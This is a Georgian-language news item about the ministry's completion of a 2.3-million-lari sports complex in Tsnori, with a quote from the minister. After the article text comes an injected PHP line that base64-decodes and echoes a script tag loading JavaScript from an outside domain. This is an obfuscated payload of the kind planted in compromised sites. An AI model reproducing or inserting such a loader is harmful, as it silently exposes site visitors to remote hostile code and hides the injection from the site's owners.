celsiusi
ავერსი საქკაბელი

რეგიონული განვითარებისა და ინფრასტრუქტურის სამინისტროს მუნიციპალური განვითარების ფონდმა სიღნაღის მუნიციპალიტეტის ქალაქ წნორში სპორტული კომპლექსის მშენებლობა დაასრულა. ინფორმაციას რეგიონული განვითარებისა და ინფრასტრუქტურის სამინისტრო ავრცელებს.

მათივე ცნობით, სპორტულ კომპლექსში მოეწყო კომბინირებული - მინი ფეხბურთის, კალათბურთისა და ფრენბურთის საერთაშორისო სტანდარტების მოედანი, 150 მაყურებელზე გათვლილი ტრიბუნებით. მოედნის გარდა, სპორტული კომპლექსი მოიცავს მულტიფუნციურ სივრცეს ფიზიკური მომზადებისა და ჭიდაობისთვის, ქალთა და მამაკაცთა გასახდელებსა და საშხაპეებს, ადმინისტრაციის, მწვრთნელების, მსაჯების და სამედიცინო ოთახებს.

კომპლექსი უზრუნველყოფილია ცენტრალური გათბობისა და გაგრილების სისტემებით და სრულად არის ადაპტირებული შეზღუდული შესაძლებლობის მქონე პირებისათვის.

„წნორში დასრულებული სპორტული ინფრასტრუქტურული ობიექტი ქალაქისთვის წარმოადგენს არა მხოლოდ სპორტულ ობიექტს, არამედ მიზიდულობის ახალი ცენტრს, სადაც, მოზარდებსა და პროფესიონალებს ექნებათ შესაძლებლობა ღირსეულ პირობებში ივარჯიშონ. სპორტული კომპლექსი, სადაც გათვალისწინებულია სივრცეები სპორტის სხვადასხვა სახეობისთვის, აკმაყოფილებს ყველა თანამედროვე სტანდარტს. დარწმუნებული ვარ, რომ ახალ კომპლექსში ბევრი მომავალი ჩემპიონი გაიზრდება,“ - განაცხადა რეგიონული განვითარებისა და ინფრასტრუქტურის მინისტრმა, ირაკლი ქარსელაძემ ქალაქ წნორის ახალი სპორტული კომპლექსის დათვალიერების შემდეგ.

ირაკლი ქარსელაძემ ასევე, აღნიშნა ის ინფრასტრუქტურული პროექტები, რომლებიც ქალაქის განვითარებას უწყობს ხელს. მისი თქმით, წნორს უკვე აქვს ახალი პარკი, სადაც მრავალი ღონისძიება ტარდება და 180 ბავშვზე გათვლილი ბაღის მშენებლობა-რეაბილიტაციის პროექტი მზადდება.

„ქალაქ წნორისა და მიმდებარე სოფლების მოსახლეობას უკვე აქვს კეთილმოწყობილი გარემო სპორტული აქტივობისა და სპორტის მრავალ სახეობაში ტურნირების ჩასატარებლად. ახალი სპორტკომპლექსი ქალაქისა და რეგიონის ახალგაზრდებში ჯანსაღი ცხოვრების წესის დამკვიდრებას შეუწყობს ხელს.

სპორტული კომპლექსის მშენებლობის პროექტი სახელმწიფო ბიუჯეტიდან 2.3 მილიონი ლარით დაფინანსდა,“ - აღნიშნულია სამინისტროს მიერ გავრცელებულ ინფორმაციაში.

55
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");